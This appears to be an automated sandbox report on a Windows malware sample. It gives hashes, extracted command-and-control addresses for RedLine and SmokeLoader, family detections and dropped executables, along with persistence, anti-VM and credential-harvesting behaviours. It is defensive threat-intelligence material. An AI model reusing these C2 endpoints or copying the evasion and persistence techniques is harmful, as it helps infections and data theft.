Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
111s -
max time network
1801s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 08:51
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
4
213.166.68.170:16810
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4568-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXerUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2892 4972 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6092 4972 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe family_redline C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe family_redline C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe family_redline behavioral2/memory/5336-350-0x000001CD1B880000-0x000001CD1B899000-memory.dmp family_redline behavioral2/memory/4112-379-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/3876-382-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeaskinstall53.exeWerFault.exevssvc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.execmd.exedescription pid process target process PID 4100 created 4828 4100 WerFault.exe rundll32.exe PID 916 created 4568 916 WerFault.exe Info.exe PID 6132 created 5388 6132 WerFault.exe FkdTCM26AHjprP7cVvGtWYus.exe PID 5380 created 5344 5380 askinstall53.exe VBzqFkfsDOMfFiW5eX98wd2t.exe PID 5564 created 5280 5564 WerFault.exe KV7A28Kr66vqyPcOoBia8YpL.exe PID 3060 created 5360 3060 vssvc.exe 0OT08f9pu9hybIxDMQ79H_UI.exe PID 5644 created 5328 5644 WerFault.exe maeApavXFRVyTdV1Ikfwiplv.exe PID 3968 created 5868 3968 WerFault.exe kGZKvxo6ms4BQ5U8cuw3ZTub.exe PID 5960 created 5632 5960 WerFault.exe FXxQSNcPioIFIlbegIsf_vj4.exe PID 5984 created 4112 5984 WerFault.exe 2SXoBBHk0EQOBLgphYL2mbeI.exe PID 4528 created 1432 4528 msedge.exe kUZysLnJ5VU1GTZZD0uqlySQ.exe PID 5776 created 5200 5776 WerFault.exe HA0R0oOrvoeWkYK_NWGeEuqA.exe PID 5984 created 4964 5984 WerFault.exe 7036493.exe PID 6764 created 5796 6764 WerFault.exe runvd.exe PID 7100 created 5380 7100 cmd.exe askinstall53.exe -
Processes:
resource yara_rule behavioral2/memory/4568-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp evasion C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe evasion C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe evasion C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe evasion C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5388-321-0x0000000004990000-0x0000000004A2D000-memory.dmp family_vidar behavioral2/memory/5796-547-0x0000000000BE0000-0x0000000000C7D000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
KRSetp.exeFolder.exeFolder.exeInfo.exeInstallation.exeZNjEI97V8_TzeA2vWbShf6jj.exeuAa_AbxThvGNSkQqNALUo28a.exe9DiGSOxNcKhW80kKxcL6J5ZA.exeHA0R0oOrvoeWkYK_NWGeEuqA.exemRMKJujcnUvhd7DjNMDCb8eN.exeKV7A28Kr66vqyPcOoBia8YpL.exe5VBfkYZvUYTuOQ4AHP9J6iE9.exe2SXoBBHk0EQOBLgphYL2mbeI.exeVBzqFkfsDOMfFiW5eX98wd2t.exemaeApavXFRVyTdV1Ikfwiplv.exeABhgA1_JcNSjunWCJULBHWy2.exe0OT08f9pu9hybIxDMQ79H_UI.exeFkdTCM26AHjprP7cVvGtWYus.exe_MiKooJ7I6X_jN040tJwAo75.exe1xwHsYY6JY2X9HJMmqNaZyN_.exe4VhdBSLn5e31ry9R4lNsreSR.exe1qYRY02GWnuOYFefe_sWbDLj.exeFXxQSNcPioIFIlbegIsf_vj4.exesDD53xiAFXf45j9jMPz5AqNg.exes9CZCVkwZnCKvuAXID9kjcGG.exekUZysLnJ5VU1GTZZD0uqlySQ.exeLSBnF4NXGH5rmUEXTqMKoFvs.exekGZKvxo6ms4BQ5U8cuw3ZTub.exe9avfIn5IigP_u4pj8JpAtsYA.execustomer3.exemd8_8eus.exejooyu.exejfiag3g_gg.exeZNjEI97V8_TzeA2vWbShf6jj.exekUZysLnJ5VU1GTZZD0uqlySQ.exe2SXoBBHk0EQOBLgphYL2mbeI.exe7036493.exe5VBfkYZvUYTuOQ4AHP9J6iE9.exen06BeJZiAJ9ZGyBXLy2bju0A.exe11111.exe3529569.exen06BeJZiAJ9ZGyBXLy2bju0A.tmpVC_redist.x64.exeVC_redist.x64.exe11111.exeVC_redist.x64.exe11111.exe11111.exejfiag3g_gg.exe11111.exe11111.exe11111.exemd9_1sjm.exeaskinstall53.exe22222.exeSetup.exerunvd.exeMediaBurner2.exeMediaBurner2.tmpCleaner Installation.exeVersiumresearch.exenote8876.exezhangfei.exepid process 5076 KRSetp.exe 4684 Folder.exe 5024 Folder.exe 4568 Info.exe 4584 Installation.exe 5176 ZNjEI97V8_TzeA2vWbShf6jj.exe 5164 uAa_AbxThvGNSkQqNALUo28a.exe 5188 9DiGSOxNcKhW80kKxcL6J5ZA.exe 5200 HA0R0oOrvoeWkYK_NWGeEuqA.exe 5216 mRMKJujcnUvhd7DjNMDCb8eN.exe 5280 KV7A28Kr66vqyPcOoBia8YpL.exe 5304 5VBfkYZvUYTuOQ4AHP9J6iE9.exe 5352 2SXoBBHk0EQOBLgphYL2mbeI.exe 5344 VBzqFkfsDOMfFiW5eX98wd2t.exe 5328 maeApavXFRVyTdV1Ikfwiplv.exe 5336 ABhgA1_JcNSjunWCJULBHWy2.exe 5360 0OT08f9pu9hybIxDMQ79H_UI.exe 5388 FkdTCM26AHjprP7cVvGtWYus.exe 5436 _MiKooJ7I6X_jN040tJwAo75.exe 5428 1xwHsYY6JY2X9HJMmqNaZyN_.exe 5420 4VhdBSLn5e31ry9R4lNsreSR.exe 5476 1qYRY02GWnuOYFefe_sWbDLj.exe 5632 FXxQSNcPioIFIlbegIsf_vj4.exe 5616 sDD53xiAFXf45j9jMPz5AqNg.exe 5624 s9CZCVkwZnCKvuAXID9kjcGG.exe 5608 kUZysLnJ5VU1GTZZD0uqlySQ.exe 5860 LSBnF4NXGH5rmUEXTqMKoFvs.exe 5868 kGZKvxo6ms4BQ5U8cuw3ZTub.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 6100 customer3.exe 1388 md8_8eus.exe 1496 jooyu.exe 4872 jfiag3g_gg.exe 5428 ZNjEI97V8_TzeA2vWbShf6jj.exe 1432 kUZysLnJ5VU1GTZZD0uqlySQ.exe 4112 2SXoBBHk0EQOBLgphYL2mbeI.exe 4964 7036493.exe 3876 5VBfkYZvUYTuOQ4AHP9J6iE9.exe 6052 n06BeJZiAJ9ZGyBXLy2bju0A.exe 6084 11111.exe 4288 3529569.exe 5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp 4104 VC_redist.x64.exe 5648 VC_redist.x64.exe 444 11111.exe 6020 VC_redist.x64.exe 2876 11111.exe 5252 11111.exe 1120 jfiag3g_gg.exe 3292 11111.exe 4164 11111.exe 5484 11111.exe 4680 md9_1sjm.exe 5380 askinstall53.exe 1444 22222.exe 3800 Setup.exe 5796 runvd.exe 1344 MediaBurner2.exe 5380 askinstall53.exe 5492 MediaBurner2.tmp 2308 Cleaner Installation.exe 4192 Versiumresearch.exe 5572 note8876.exe 2080 zhangfei.exe -
Processes:
resource yara_rule behavioral2/memory/1388-332-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
_MiKooJ7I6X_jN040tJwAo75.exe4VhdBSLn5e31ry9R4lNsreSR.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _MiKooJ7I6X_jN040tJwAo75.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4VhdBSLn5e31ry9R4lNsreSR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4VhdBSLn5e31ry9R4lNsreSR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _MiKooJ7I6X_jN040tJwAo75.exe -
Drops startup file 2 IoCs
Processes:
customer3.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 12 IoCs
Processes:
rundll32.exeABhgA1_JcNSjunWCJULBHWy2.exe9avfIn5IigP_u4pj8JpAtsYA.exen06BeJZiAJ9ZGyBXLy2bju0A.tmpVC_redist.x64.exeMediaBurner2.tmpCleaner Installation.exerundll32.exepid process 4828 rundll32.exe 5336 ABhgA1_JcNSjunWCJULBHWy2.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp 5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp 5648 VC_redist.x64.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5492 MediaBurner2.tmp 2308 Cleaner Installation.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5724 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe themida C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe themida C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe themida behavioral2/memory/5420-354-0x0000000000600000-0x0000000000601000-memory.dmp themida behavioral2/memory/5436-351-0x00000000004E0000-0x00000000004E1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
msedge.exe6280455.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6280455.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
_MiKooJ7I6X_jN040tJwAo75.exe4VhdBSLn5e31ry9R4lNsreSR.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _MiKooJ7I6X_jN040tJwAo75.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4VhdBSLn5e31ry9R4lNsreSR.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 69 ipinfo.io 79 ip-api.com 148 ipinfo.io 13 ipinfo.io 52 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
4VhdBSLn5e31ry9R4lNsreSR.exe_MiKooJ7I6X_jN040tJwAo75.exepid process 5420 4VhdBSLn5e31ry9R4lNsreSR.exe 5436 _MiKooJ7I6X_jN040tJwAo75.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
ZNjEI97V8_TzeA2vWbShf6jj.exe2SXoBBHk0EQOBLgphYL2mbeI.exe5VBfkYZvUYTuOQ4AHP9J6iE9.exedescription pid process target process PID 5176 set thread context of 5428 5176 ZNjEI97V8_TzeA2vWbShf6jj.exe ZNjEI97V8_TzeA2vWbShf6jj.exe PID 5352 set thread context of 4112 5352 2SXoBBHk0EQOBLgphYL2mbeI.exe 2SXoBBHk0EQOBLgphYL2mbeI.exe PID 5304 set thread context of 3876 5304 5VBfkYZvUYTuOQ4AHP9J6iE9.exe 5VBfkYZvUYTuOQ4AHP9J6iE9.exe -
Drops file in Program Files directory 64 IoCs
Processes:
9avfIn5IigP_u4pj8JpAtsYA.exeSetup.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe -
Drops file in Windows directory 1 IoCs
Processes:
WerFault.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 344 4828 WerFault.exe rundll32.exe 4700 4568 WerFault.exe Info.exe 2512 5388 WerFault.exe FkdTCM26AHjprP7cVvGtWYus.exe 5488 5344 WerFault.exe VBzqFkfsDOMfFiW5eX98wd2t.exe 5604 5280 WerFault.exe KV7A28Kr66vqyPcOoBia8YpL.exe 1444 5360 WerFault.exe 0OT08f9pu9hybIxDMQ79H_UI.exe 4832 5328 WerFault.exe maeApavXFRVyTdV1Ikfwiplv.exe 2312 5868 WerFault.exe kGZKvxo6ms4BQ5U8cuw3ZTub.exe 4724 5200 WerFault.exe HA0R0oOrvoeWkYK_NWGeEuqA.exe 5128 4964 WerFault.exe 7036493.exe 6844 5796 WerFault.exe runvd.exe 3696 5380 WerFault.exe askinstall53.exe 6104 5724 WerFault.exe rundll32.exe 4628 5648 WerFault.exe VC_redist.x64.exe 4560 7120 WerFault.exe 6891150.exe 6244 5096 WerFault.exe 5975108.exe 6724 4660 WerFault.exe VC_redist.x86.exe 5056 7024 WerFault.exe InstallShadowVPN.exe 6920 7024 WerFault.exe InstallShadowVPN.exe 5412 1492 WerFault.exe anyname.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe nsis_installer_2 C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exeZNjEI97V8_TzeA2vWbShf6jj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000